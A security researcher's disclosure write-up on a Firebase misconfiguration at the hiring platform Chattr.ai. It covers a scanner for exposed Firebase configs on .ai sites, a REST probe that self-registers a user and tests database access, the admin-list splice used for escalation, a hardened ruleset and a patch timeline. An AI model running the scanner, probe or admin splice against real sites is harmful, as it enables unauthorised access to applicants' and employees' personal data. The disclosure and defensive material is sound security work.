Also check out Eva's blog post on this event.
With an upbeat pling, my console alerted me that my script had finished running. To be precise, it had been searching for exposed Firebase credentials across hundreds of recent AI startups.
This was achieved by taking a public list of sites using the .ai TLD and parsing each site's data (and any referenced .js bundles) for references to the common Firebase initialisation variables.
```javascript
// The kind of web-app config the scanner matches on (placeholder values).
Production: {
  apiKey: "AIza<Insert_Funny_Joke_Here>",
  authDomain: "KFC.firebaseapp.com",
  databaseURL: "https://KFC.firebaseio.com",
  projectId: "KFC",
  storageBucket: "KFC.appspot.com",
  messagingSenderId: "123456789"
}
```
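The scanning step described above comes down to two things: collecting the `<script src>` URLs on a page, then matching the Firebase initialisation keys in the fetched bundle text. The code below is an added example and not the author's script. The sample HTML and bundle in it are constructed, and the API key is a placeholder of the right shape (Firebase web API keys are Google API keys starting with "AIza"), not a real one.

```javascript
// Added example (not the author's scanner): find Firebase web configs in page/bundle text.

const FIREBASE_KEYS = [
  "authDomain", "databaseURL", "projectId", "storageBucket", "messagingSenderId", "appId",
];

// Firebase web API keys are Google API keys and start with "AIza".
const API_KEY_RE = /["']?apiKey["']?\s*:\s*["'](AIza[0-9A-Za-z_-]{20,})["']/g;

// Absolute URLs of every <script src> on a page, resolved against the page URL.
function scriptSrcs(html, pageUrl) {
  const out = [];
  for (const m of html.matchAll(/<script\b[^>]*\bsrc\s*=\s*["']([^"']+)["']/gi)) {
    out.push(new URL(m[1], pageUrl).href);
  }
  return out;
}

// Every initializeApp-style config in a blob of JS: each apiKey plus whatever
// sibling keys sit within a few hundred bytes of it (configs are usually one literal).
function extractFirebaseConfigs(text) {
  const configs = new Map(); // apiKey -> config, so repeated bundles don't duplicate
  for (const m of text.matchAll(API_KEY_RE)) {
    const region = text.slice(Math.max(0, m.index - 600), m.index + m[0].length + 600);
    const cfg = { apiKey: m[1] };
    for (const key of FIREBASE_KEYS) {
      const kv = new RegExp(`["']?\\b${key}\\b["']?\\s*:\\s*["']([^"']+)["']`).exec(region);
      if (kv) cfg[key] = kv[1];
    }
    // Only a project with a Realtime Database URL can be probed the way the post describes.
    if (cfg.databaseURL && !configs.has(cfg.apiKey)) configs.set(cfg.apiKey, cfg);
  }
  return [...configs.values()];
}

// Constructed sample input (not real data): a landing page and a minified bundle.
const SAMPLE_HTML = '<html><head><script src="/static/js/main.3f2a.js"></script></head></html>';
const SAMPLE_BUNDLE =
  'var e=firebase.initializeApp({apiKey:"AIzaSyEXAMPLEKEY0000000000000000000000",' +
  'authDomain:"example-app.firebaseapp.com",databaseURL:"https://example-app.firebaseio.com",' +
  'projectId:"example-app",storageBucket:"example-app.appspot.com",messagingSenderId:"123456789"});';

function scanDemo() {
  const bundles = scriptSrcs(SAMPLE_HTML, "https://example-app.ai/");
  const configs = extractFirebaseConfigs(SAMPLE_BUNDLE);
  return { bundles, configs };
}
```

In a real run the bundle URLs returned by `scriptSrcs` are fetched and passed to `extractFirebaseConfigs`; a hit is only a lead, since an exposed web config is normal for Firebase and the real question is what the project's security rules allow.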
My hunch was that in the rush to push their shiny new product, someone would take a shortcut and forget to implement proper security rules.
The hunch was right, and it was worse than I could ever have guessed.
Meet Chattr.ai
…the self-proclaimed AI hiring system that claims to shave 88% off the time it takes to hire new people.
They provide their services to a large number of fast food chains and other hourly employers across the United States, including but not limited to:
- Applebee's
- Arby's
- Chick-fil-A
- Dunkin'
- IHOP
- KFC
- Shoney's
- Subway
- Taco Bell
- Target
- Wendy's
The Vulnerability
If you drop the Firebase configuration from the JS bundle into Firepwn, you start out with zero permissions, as you can see in the following screenshot.
But if you use Firebase's own registration feature to create a new user (you cannot register on their site), you get full read/write privileges to the Firebase DB.
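The two-step check just described (unauthenticated read denied, then a freshly self-registered user reading everything) can be scripted directly against Firebase's public REST endpoints rather than through Firepwn. The code below is an added example and not the author's tooling: it builds the Identity Toolkit sign-up request and the Realtime Database read/write requests from a config like the one shown earlier, and `probeAuthGap` sends them through an injectable `fetch` so the logic can be exercised offline with the fake transport at the bottom. The config values, credentials and token strings are placeholders.

```javascript
// Added example (not the author's tooling): reproduce the "zero permissions
// unauthenticated, full read/write after self-registration" check via REST.

// Firebase Auth REST: creating an email/password user needs nothing but the web
// API key, which is why an app that never shows a sign-up page is still open to
// registration unless the provider is disabled in the Firebase console.
function signUpRequest(cfg, email, password) {
  return {
    method: "POST",
    url: `https://identitytoolkit.googleapis.com/v1/accounts:signUp?key=${encodeURIComponent(cfg.apiKey)}`,
    headers: { "Content-Type": "application/json" },
    body: JSON.stringify({ email, password, returnSecureToken: true }),
  };
}

// Realtime Database REST: GET/PUT/PATCH on <databaseURL>/<path>.json, with the
// user's ID token passed as ?auth=. shallow=true keeps a root read cheap.
function rtdbRequest(cfg, path, { method = "GET", idToken, body, shallow = false } = {}) {
  const url = new URL(`${path.replace(/^\/+/, "")}.json`, cfg.databaseURL.replace(/\/?$/, "/"));
  if (idToken) url.searchParams.set("auth", idToken);
  if (shallow) url.searchParams.set("shallow", "true");
  return {
    method,
    url: url.href,
    headers: { "Content-Type": "application/json" },
    body: body === undefined ? undefined : JSON.stringify(body),
  };
}

// RTDB answers a rules denial with HTTP 401 and {"error":"Permission denied"};
// 403 is included because other Firebase REST surfaces use it for the same thing.
function classify(status) {
  if (status === 200) return "allowed";
  if (status === 401 || status === 403) return "denied";
  return `unexpected(${status})`;
}

// Run the check. fetchImpl has the global fetch signature; a fake is injected below.
async function probeAuthGap(cfg, { email, password }, fetchImpl = globalThis.fetch) {
  const send = (req) => fetchImpl(req.url, { method: req.method, headers: req.headers, body: req.body });
  const anon = await send(rtdbRequest(cfg, "/", { shallow: true }));
  const signup = await send(signUpRequest(cfg, email, password));
  if (!signup.ok) return { unauthenticated: classify(anon.status), signUp: classify(signup.status) };
  const { idToken } = await signup.json();
  const authed = await send(rtdbRequest(cfg, "/", { idToken, shallow: true }));
  return { unauthenticated: classify(anon.status), signUp: "allowed", authenticated: classify(authed.status) };
}

// Placeholder config, same shape as the one pulled from the bundle.
const CFG = {
  apiKey: "AIzaSyEXAMPLEKEY0000000000000000000000",
  databaseURL: "https://example-app.firebaseio.com",
};

// Constructed fake transport modelling the misconfiguration: any request carrying
// ?auth= is allowed, any request without it is denied, and sign-up always succeeds.
async function fakeFetch(url) {
  const u = new URL(url);
  if (u.hostname === "identitytoolkit.googleapis.com") {
    return { ok: true, status: 200, json: async () => ({ idToken: "fake-id-token", localId: "uid123" }) };
  }
  const allowed = u.searchParams.has("auth");
  return { ok: allowed, status: allowed ? 200 : 401, json: async () => (allowed ? {} : { error: "Permission denied" }) };
}
```

A result of `unauthenticated: "denied"` followed by `authenticated: "allowed"` on the root path is the signature of a ruleset that gates on `auth != null` and nothing else. The same `rtdbRequest` builder with `method: "PATCH"` and a `body` produces the write that the rest of the post relies on, so a read-only probe is enough to know the write is there too.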
The data it exposes includes but is not limited to:
- Names
- Phone numbers
- Emails
- Plaintext passwords (only some accounts had exposed passwords)
- Locations of branches
- Confidential messages
- Shifts
For the following:
- Chattr employees
- Franchisee managers
- Job applicants
It Gets… Worse?!
Yeah, it somehow manages to get even worse.
If you grab the list of admin users from /orgs/0/users, you can splice a new entry into it, giving you full access to their Administrator dashboard.
As you can see below, it allows for even more control over their systems, including accepting/denying applicants or even refunding payments made to Chattr.
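What makes the admin-list splice possible is that "is this user an admin?" is answered by a database node that any signed-in user can write. The block below is an added illustration, not Chattr's code or their actual rules (the post does not show those): it states a least-privilege Realtime Database ruleset for the paths the post names, in which admin rights come from a custom token claim that only the server can set, and a small `authorize` function implementing the same policy in plain JavaScript so the decisions can be checked offline. The `$org`/`$uid` layout, the `applicants` path and the `admin` claim name are assumptions.

```javascript
// Added illustration (not Chattr's rules): least-privilege policy for the paths the post names.
// Equivalent database.rules.json, for comparison with a catch-all like ".read": "auth != null".
const HARDENED_RULES = {
  rules: {
    // Nothing is readable or writable at the root; access is opened per path below
    // (in RTDB a deeper rule can grant what a shallower rule denies, never the reverse).
    ".read": false,
    ".write": false,
    orgs: {
      $org: {
        // The admin list is only visible to, and only editable by, admins. The claim
        // is set server-side with the Admin SDK (setCustomUserClaims), so a
        // self-registered user cannot grant it to themselves by writing to the DB.
        users: {
          ".read": "auth.token.admin === true",
          ".write": "auth.token.admin === true",
        },
      },
    },
    applicants: {
      // An applicant sees and edits only their own record; admins can read all of them.
      $uid: {
        ".read": "auth.uid === $uid || auth.token.admin === true",
        ".write": "auth.uid === $uid",
      },
    },
  },
};

// The same policy as code so it can be exercised offline. auth is null for an
// unauthenticated caller, otherwise { uid, token: { admin?: boolean } } as the
// ID token would carry it. op is "read" or "write".
function authorize(op, path, auth) {
  const seg = path.replace(/^\/+|\/+$/g, "").split("/");
  const isAdmin = !!(auth && auth.token && auth.token.admin === true);
  if (seg[0] === "orgs" && seg.length >= 3 && seg[2] === "users") {
    return isAdmin;                                   // /orgs/$org/users and below
  }
  if (seg[0] === "applicants" && seg.length >= 2) {
    const own = !!auth && auth.uid === seg[1];        // /applicants/$uid and below
    return op === "read" ? own || isAdmin : own;
  }
  return false;                                       // default deny
}

// Three callers: nobody, what self-registration gets you, and a real admin.
function policyDemo() {
  const anon = null;
  const freshUser = { uid: "uid123", token: {} };
  const admin = { uid: "admin1", token: { admin: true } };
  return {
    anonReadsAdmins: authorize("read", "/orgs/0/users", anon),
    freshUserReadsAdmins: authorize("read", "/orgs/0/users", freshUser),
    freshUserSplicesAdmins: authorize("write", "/orgs/0/users/uid123", freshUser),
    freshUserReadsOthers: authorize("read", "/applicants/someone-else", freshUser),
    freshUserReadsOwn: authorize("read", "/applicants/uid123", freshUser),
    adminReadsAdmins: authorize("read", "/orgs/0/users", admin),
    adminEditsAdmins: authorize("write", "/orgs/0/users/uid999", admin),
  };
}
```

The point of the comparison is the source of truth: with `auth.token.admin` the dashboard and the rules both trust a claim that is minted by the Admin SDK and cannot be altered from the client, whereas a list under `/orgs/0/users` that the client can write is, by construction, attacker-controlled input.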
Timeline (DD/MM)
- 06/01 – Vulnerability discovered
- 09/01 – Write-up completed and emailed to them
- 10/01 – Vulnerability patched
- 11/01 – Support ticket closed; no thanks or further contact received despite explicitly requesting it
Credits
To my friends who assisted me with this pentest and its responsible disclosure:
- Logykk
- Eva – https://kibty.town/blog/chattr
Originally published on MrBruh's Epic Blog: How I pwned half of America's fast food chains, simultaneously.